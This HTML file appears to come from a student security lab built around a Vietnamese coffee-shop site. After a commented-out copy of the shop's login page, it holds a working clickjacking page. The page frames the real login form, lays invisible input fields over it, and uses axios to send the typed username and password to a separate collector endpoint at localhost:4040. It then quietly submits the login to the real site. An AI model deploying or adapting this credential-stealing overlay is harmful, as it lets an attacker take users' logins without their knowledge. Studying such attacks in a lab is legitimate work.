<!--<!DOCTYPE html>-->
<!--<html lang="en" xmlns:th="http://www.thymeleaf.org">-->
<!--<head>-->
<!--    <meta charset="UTF-8">-->
<!--    <meta name="viewport" content="width=device-width, initial-scale=1">-->
<!--    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"-->
<!--          integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"-->
<!--          crossorigin="anonymous">-->
<!--    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>-->
<!--    <link rel="preconnect" href="https://fonts.googleapis.com">-->
<!--    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>-->
<!--    <link href="https://fonts.googleapis.com/css2?family=Lora:wght@400;500;600&display=swap" rel="stylesheet">-->
<!--    <link rel="stylesheet" href="/css/filtro/base.css" th:href="@{/css/filtro/base.css}">-->
<!--    <script src="https://kit.fontawesome.com/bbe981fbfc.js" crossorigin="anonymous"></script>-->
<!--    <script src="https://unpkg.com/@popperjs/core@2"></script>-->
<!--    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>-->
<!--    <script src="https://cdn.jsdelivr.net/npm/qs/dist/qs.js"></script>-->
<!--    <title> Filtro Coffee Shop</title>-->
<!--</head>-->
<!--<body>-->
<!--<div th:fragment="navigation">-->
<!--    &lt;!&ndash;    <iframe src="https://www.we45.com"/>&ndash;&gt;-->
<!--    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">-->
<!--        <div class="container-fluid">-->
<!--            <a class="navbar-brand" th:href="@{/}">Filtro Coffee Store</a>-->
<!--            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"-->
<!--                    aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">-->
<!--                <span class="navbar-toggler-icon"></span>-->
<!--            </button>-->
<!--            <div class="collapse navbar-collapse" id="navbarNav">-->
<!--                <ul class="navbar-nav mx-auto">-->
<!--                    <li class="nav-item">-->
<!--                        <a class="nav-link" href="http://localhost:3030/">TRANG CHỦ <span class="sr-only">(current)</span></a>-->
<!--                    </li>-->
<!--                    <li class="nav-item dropdown">-->
<!--                        <a class="nav-link dropdown-toggle" href="http://localhost:3030/category/all" role="button" data-toggle="dropdown"-->
<!--                           aria-expanded="false">CÀ PHÊ</a>-->
<!--                    </li>-->
<!--                    <li class="nav-item">-->
<!--                        <a class="nav-link" href="">LIÊN HỆ</a>-->
<!--                    </li>-->
<!--                </ul>-->
<!--                <div class="col-md-5 text-center">-->
<!--                    <div class="row justify-content-end align-items-center">-->
<!--                        <div class="col-8 col-md-6">-->
<!--                            <form action="http://localhost:3030/search}" method="get" class="form-inline">-->
<!--                                <div class="input-group">-->
<!--                                    <input name="name" type="text" class="form-control"-->
<!--                                           placeholder="Search for coffee products...">-->
<!--                                    <div class="input-group-append">-->
<!--                                        <button class="btn btn-outline-secondary" type="submit">-->
<!--                                            <i class="fa-solid fa-magnifying-glass"></i>-->
<!--                                        </button>-->
<!--                                    </div>-->
<!--                                </div>-->
<!--                            </form>-->
<!--                        </div>-->
<!--                        <div class="col-4 col-md-3">-->
<!--                            <ul class="navbar-nav">-->
<!--                                <li class="nav-item">-->
<!--                                    <a class="nav-link" href="http://localhost:3030/cart}">-->
<!--                                        <i class="small fa fa-shopping-cart"></i><span class="small">GIỎ HÀNG</span>-->
<!--                                        <th:block-->
<!--                                                th:if="${(#lists.isEmpty(cartItemList) and cartItemList == null) and session.user == null}">-->
<!--                                            <span class="small badge badge-light"-->
<!--                                            >0 sản phẩm</span>-->
<!--                                        </th:block>-->
<!--                                        <th:block-->
<!--                                                th:if="${(!#lists.isEmpty(cartItemList) and cartItemList !=null) and session.user!=null}">-->
<!--                                            <span class="small badge badge-light"-->
<!--                                                  th:text="${cartItemList.size()} + ' sản phẩm'">4 sản phẩm</span>-->
<!--                                        </th:block>-->
<!--                                        <th:block-->
<!--                                                th:if="${(!#lists.isEmpty(cartItemList) or cartItemList !=null) and session.user==null}">-->
<!--                                                                                                                            <span class="small badge badge-light"-->
<!--                                                                                                                                  th:text="${cartItemList.size()} + ' sản phẩm'">4 sản phẩm</span>-->
<!--                                        </th:block>-->
<!--                                        <th:block-->
<!--                                                th:if="${(#lists.isEmpty(cartItemList) and cartItemList ==null) and session.user!=null}">-->
<!--                                                                                                                            <span class="small badge badge-light"-->
<!--                                                                                                                            >0 sản phẩm</span>-->
<!--                                        </th:block>-->
<!--                                    </a>-->
<!--                                </li>-->
<!--                            </ul>-->
<!--                        </div>-->
<!--                        <div class="col-12 col-md-3 mt-3 mt-md-0">-->
<!--                            <ul class="navbar-nav">-->
<!--                                <li th:if="${session.containsKey('account')}">-->
<!--                                    <span class="nav-link">Xin chào <span-->
<!--                                            th:if="${session.account != null}"-->
<!--                                            th:text="${session.account.accountName}"></span></span>-->
<!--                                </li>-->
<!--                                <li th:if="${session.containsKey('account')}" class="nav-item">-->
<!--                                    <a class="nav-link" th:href="@{/logout}"><span th:if="${session.account != null}"-->
<!--                                                                                   class="small">ĐĂNG XUẤT</span></a>-->
<!--                                </li>-->
<!--                                <li th:if="${session.containsKey('account')}" class="nav-item">-->
<!--                                    <a class="nav-link" th:href="@{/login}"><span th:if="${session.account == null}"-->
<!--                                                                                  class="small">ĐĂNG NHẬP</span></a>-->
<!--                                </li>-->
<!--                            </ul>-->
<!--                        </div>-->
<!--                    </div>-->
<!--                </div>-->
<!--            </div>-->
<!--        </div>-->
<!--    </nav>-->
<!--</div>-->

<!--<div class="container">-->
<!--    <div class="row">-->

<!--        <div class="col-12">-->
<!--            <h2 class="text-center mt-5">Đăng nhập</h2>-->
<!--        </div>-->
<!--    </div>-->
<!--    <div class="row mt-5 justify-content-center">-->
<!--        </div>-->
<!--    <div class="col-6" style="margin-left: 264px">-->
<!--        <form method="post" action="http://localhost:3030/login" id="loginForm">-->
<!--            <div id="errorMessage" th:if="${message}" class="alert alert-danger" role="alert"-->
<!--                 th:text="${message}">-->
<!--            </div>-->
<!--            <div id="errorMessage1" th:if="${errorMessage}" class="alert alert-danger" role="alert"-->
<!--                 th:text="${errorMessage}">-->
<!--            </div>-->

<!--            &lt;!&ndash; Email input &ndash;&gt;-->
<!--            <div class="form-outline mb-4">-->
<!--                <label class="form-label" for="username">Tên tài khoản</label>-->
<!--                <input name="accountName" type="text" id="username" class="form-control" required/>-->
<!--            </div>-->

<!--            &lt;!&ndash; Password input &ndash;&gt;-->
<!--            <div class="form-outline mb-4">-->
<!--                <label class="form-label" for="password">Mật khẩu</label>-->
<!--                <input name="password" type="password" id="password" class="form-control" required/>-->
<!--            </div>-->

<!--            &lt;!&ndash; 2 column grid layout for inline styling &ndash;&gt;-->
<!--            <div class="row mb-4">-->
<!--                <div class="col d-flex justify-content-center">-->
<!--                    &lt;!&ndash; Checkbox &ndash;&gt;-->
<!--                    <div class="form-check">-->
<!--                        <input class="form-check-input" type="checkbox" value="" id="rememberMe" checked/>-->
<!--                        <label class="form-check-label" for="rememberMe"> Nhớ tôi khi đăng nhập</label>-->
<!--                    </div>-->
<!--                </div>-->

<!--                <div class="col">-->
<!--                    &lt;!&ndash; Simple link &ndash;&gt;-->
<!--                    <a th:href="@{/forgot-password}">Quên mật khẩu?</a>-->
<!--                </div>-->
<!--            </div>-->

<!--            &lt;!&ndash; Submit button &ndash;&gt;-->
<!--            <button type="submit" class="btn btn-primary btn-block mb-4">Đăng nhập</button>-->
<!--            <input type="hidden" name="_csrfParameterName" th:value="${_csrfToken}">-->
<!--            &lt;!&ndash; Register buttons &ndash;&gt;-->
<!--            <div class="text-center">-->
<!--                <p>Không phải thành viên? <a th:href="@{/register}">Đăng ký ngay</a></p>-->
<!--                <p>hoặc đăng nhập bằng:</p>-->
<!--                <button type="button" class="btn btn-link btn-floating mx-1">-->
<!--                    <i class="fab fa-facebook-f"></i>-->
<!--                </button>-->

<!--                <button type="button" class="btn btn-link btn-floating mx-1">-->
<!--                    <i class="fab fa-google"></i>-->
<!--                </button>-->

<!--                <button type="button" class="btn btn-link btn-floating mx-1">-->
<!--                    <i class="fab fa-twitter"></i>-->
<!--                </button>-->

<!--                <button type="button" class="btn btn-link btn-floating mx-1">-->
<!--                    <i class="fab fa-github"></i>-->
<!--                </button>-->
<!--            </div>-->
<!--        </form>-->
<!--    </div>-->

<!--</div>-->

<!--<div th:fragment="footer">-->
<!--    <footer class="text-light">-->
<!--        <div class="container">-->
<!--            <div class="row">-->
<!--                <div class="col-md-3 col-lg-4 col-xl-3">-->
<!--                    <h5>Giới thiệu</h5>-->
<!--                    <hr class="bg-white mb-2 mt-0 d-inline-block mx-auto w-25">-->
<!--                    <p class="mb-0">-->
<!--                        Le Lorem Ipsum est simplement du faux texte employé dans la composition et la mise en page avant-->
<!--                        impression.-->
<!--                    </p>-->
<!--                </div>-->

<!--                <div class="col-md-2 col-lg-2 col-xl-2 mx-auto">-->
<!--                    <h5>Thông tin thêm</h5>-->
<!--                    <hr class="bg-white mb-2 mt-0 d-inline-block mx-auto w-25">-->
<!--                    <ul class="list-unstyled">-->
<!--                        <li><a href="">Trang chủ</a></li>-->
<!--                        <li><a href="">Sản phẩm</a></li>-->
<!--                        <li><a href="">Blog</a></li>-->
<!--                        <li><a href="">Giỏ hàng</a></li>-->
<!--                    </ul>-->
<!--                </div>-->

<!--                <div class="col-md-3 col-lg-2 col-xl-2 mx-auto">-->
<!--                    <h5>Liên hệ</h5>-->
<!--                    <hr class="bg-white mb-2 mt-0 d-inline-block mx-auto w-25">-->
<!--                    <ul class="list-unstyled">-->
<!--                        <li><span class="italic">FILTRO</span></li>-->
<!--                        <li><p>Xin cái địa chỉ</p></li>-->
<!--                    </ul>-->
<!--                </div>-->

<!--                <div class="col-md-4 col-lg-3 col-xl-3">-->
<!--                    <h5>Contact</h5>-->
<!--                    <hr class="bg-white mb-2 mt-0 d-inline-block mx-auto w-25">-->
<!--                    <ul class="list-unstyled">-->
<!--                        <li><i class="fa fa-home mr-2"></i> My company</li>-->
<!--                        <li><i class="fa fa-envelope mr-2"></i> email@example.com</li>-->
<!--                        <li><i class="fa fa-phone mr-2"></i> + 33 12 14 15 16</li>-->
<!--                        <li><i class="fa fa-print mr-2"></i> + 33 12 14 15 16</li>-->
<!--                    </ul>-->
<!--                </div>-->
<!--                <div class="col-12 copyright mt-3">-->
<!--                    <p class="float-left">-->
<!--                        <a href="#">Back to top</a>-->
<!--                    </p>-->
<!--                    <p class="text-right text-muted">created with <i class="fa fa-heart"></i> by <a-->
<!--                            href="https://github.com/Arkadian404/filtro_coffee_store"><i>Arkadian</i></a> |-->
<!--                        <span>v. -1.0</span></p>-->
<!--                </div>-->
<!--            </div>-->
<!--        </div>-->
<!--    </footer>-->
<!--</div>-->

<!--<script>-->
<!--    // import axios from "axios";-->

<!--    function submitForm(event) {-->
<!--        event.preventDefault(); // Ngăn chặn hành vi mặc định của form-->

<!--        // var form = document.getElementById('loginForm');-->
<!--        var form = event.target.closest('form'); // Lấy đối tượng form gần nhất từ nút submit được nhấn-->
<!--        var accountName = form.elements['accountName'].value;-->
<!--        var password = form.elements['password'].value;-->

<!--        // Tạo thông báo alert-->
<!--        // var alertMessage = 'Đăng nhập thành công!\n\n';-->
<!--        // alertMessage += 'Tên tài khoản: ' + accountName + '\n';-->
<!--        // alertMessage += 'Mật khẩu: ' + password;-->
<!--        //-->
<!--        // alert(alertMessage);-->

<!--        const data = {-->
<!--            accountName: accountName,-->
<!--            password: password-->
<!--        };-->
<!--        const formData = new URLSearchParams();-->
<!--        for (const key in data) {-->
<!--            formData.append(key, data[key]);-->
<!--        }-->
<!--        axios.post('http://localhost:4040/home/xuLyClickJacking', formData)-->
<!--            .then(response => {-->
<!--                // Xử lý phản hồi từ server nếu cần thiết-->
<!--                console.log(response.data);-->
<!--            })-->
<!--            .catch(error => {-->
<!--                // Xử lý lỗi nếu có-->
<!--                console.error(error);-->
<!--            });-->

<!--        // Gửi yêu cầu đăng nhập tới server-->
<!--        form.submit();-->
<!--    }-->

<!--    var submitButtons = document.querySelectorAll('button[type="submit"]');-->
<!--    submitButtons.forEach(button => {-->
<!--        button.addEventListener('click', submitForm);-->
<!--    });-->
<!--</script>-->
<!--</body>-->
<!--</html>-->

<!-- <iframe src="http://localhost:3030/product/6">Bấm vào đây xem cà phê</iframe> -->
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <script scr="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/qs/dist/qs.js"></script>
    <meta charset="UTF-8">
    <!-- <meta http-equiv="X-UA-Compatible" content="IE=edge"> -->
    <!-- <meta name="viewport" content="width=device-width, initial-scale=1.0"> -->
    <title></title>
    <style media="screen">
        body{

        }
        div{
            color:transparent;
            border: none;
            position: absolute;
            width: 100px;
            height: 100px;
        }
        iframe{
            border: none;
            width: 100%;
            height: 100%;
            position: absolute;
            overflow: hidden;
            /* overflow: auto;
            overflow: -moz-scrollbars-none;
            -ms-overflow-style: none; */
            margin-right: -20px;
            overflow-y: scroll;
        }
        /* iframe::-webkit-scrollbar{
            width: 0 !important;
            display: none;
        } */
        a{
            color: transparent;
            display: block;
            width: 100px;
            height: 100px;
        }
        .center-input-accountname {
            position: fixed;
            top: 45.5%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: transparent;
            width: fit-content;
        }
        .center-input-accountname input {
            width: 540px;
            height: 36px;
            background-color: transparent;
            border: 1px solid transparent;
            outline: none;
        }
        .center-input-password {
            position: fixed;
            top: 58.5%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: transparent;
            width: fit-content;
        }
        .center-input-password input {
            width: 540px;
            height: 36px;
            background-color: transparent;
            border: 1px solid transparent;
            outline: none;
        }
        .center-input-submitbutton {
            position: fixed;
            top: 73.5%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: transparent;
            width: fit-content;
        }
        .center-input-submitbutton button {
            width: 540px;
            height: 36px;
            background-color: transparent;
            border: 1px solid transparent;
            outline: none;
            /*display: none;*/
            color: transparent;
        }
    </style>
</head>
<body>
<iframe id="frameclick" src="http://localhost:3030/login" width="" height=""></iframe>
<div class="center-input-accountname" >
    <input name="accountName" type="text" id="username" class="form-control" required/>
</div>
<div class="center-input-password">
    <input name="password" type="password" id="password" class="form-control" required/>
</div>
<div class="center-input-submitbutton">
    <button type="submit" id="submitbutton" class="btn btn-primary btn-block mb-4">Đăng nhập</button>
</div>
<div style="display: none;">
    <form id="hiddenForm" action="http://localhost:3030/login" method="POST">
        <input type="hidden" name="accountName" id="hiddenAccountName">
        <input type="hidden" name="password" id="hiddenPassword">
    </form>
</div>
</body>
<script>
    document.addEventListener("DOMContentLoaded", function() {
        var accountNameInput = document.querySelector(".center-input-accountname input");
        var passwordInput = document.querySelector(".center-input-password input");
        var submitButton = document.getElementById("submitbutton");
        var hiddenAccountNameInput = document.getElementById("hiddenAccountName");
        var hiddenPasswordInput = document.getElementById("hiddenPassword");

        submitButton.addEventListener("click", function(event) {
            event.preventDefault();

            var accountName = accountNameInput.value;
            var password = passwordInput.value;
            hiddenAccountNameInput.value = accountNameInput.value;
            hiddenPasswordInput.value = passwordInput.value;

            // alert("Tên tài khoản: " + accountName + "\nMật khẩu: " + password);
            const data = {
                accountName: accountName,
                password: password
            };
            const formData = new URLSearchParams();
            for (const key in data) {
                formData.append(key, data[key]);
            }
            axios.post('http://localhost:4040/home/xuLyClickJacking', formData)
                .then(response => {
                    // Xử lý phản hồi từ server nếu cần thiết
                    console.log(response.data);
                })
                .catch(error => {
                    // Xử lý lỗi nếu có
                    console.error(error);
                });
            document.getElementById("hiddenForm").submit();
        });
    });
</script>
<script>
    // import axios from "axios";

    function submitForm(event) {
        event.preventDefault(); // Ngăn chặn hành vi mặc định của form

        // var form = document.getElementById('loginForm');
        var form = event.target.closest('form'); // Lấy đối tượng form gần nhất từ nút submit được nhấn
        var accountName = form.elements['accountName'].value;
        var password = form.elements['password'].value;

        // Tạo thông báo alert
        // var alertMessage = 'Đăng nhập thành công!\n\n';
        // alertMessage += 'Tên tài khoản: ' + accountName + '\n';
        // alertMessage += 'Mật khẩu: ' + password;
        //
        // alert(alertMessage);

        const data = {
            accountName: accountName,
            password: password
        };
        const formData = new URLSearchParams();
        for (const key in data) {
            formData.append(key, data[key]);
        }
        axios.post('http://localhost:4040/home/xuLyClickJacking', formData)
            .then(response => {
                // Xử lý phản hồi từ server nếu cần thiết
                console.log(response.data);
            })
            .catch(error => {
                // Xử lý lỗi nếu có
                console.error(error);
            });

        // Gửi yêu cầu đăng nhập tới server
        form.submit();
    }

    var submitButtons = document.querySelectorAll('button[type="submit"]');
    submitButtons.forEach(button => {
        button.addEventListener('click', submitForm);
    });
</script>
</html>

<!--<!DOCTYPE html>-->
<!--<html>-->
<!--<head>-->
<!--    <title>Trang Web Của Bạn</title>-->
<!--</head>-->
<!--<body>-->
<!--<h1>Trang đăng nhập</h1>-->
<!--<iframe id="loginFrame" src="http://localhost:3030/login"></iframe>-->
<!--<script>-->
<!--    // Ẩn iframe sau khi đã nhúng-->
<!--    // document.getElementById('loginFrame').style.display = 'none';-->
<!--</script>-->
<!--</body>-->
<!--</html>-->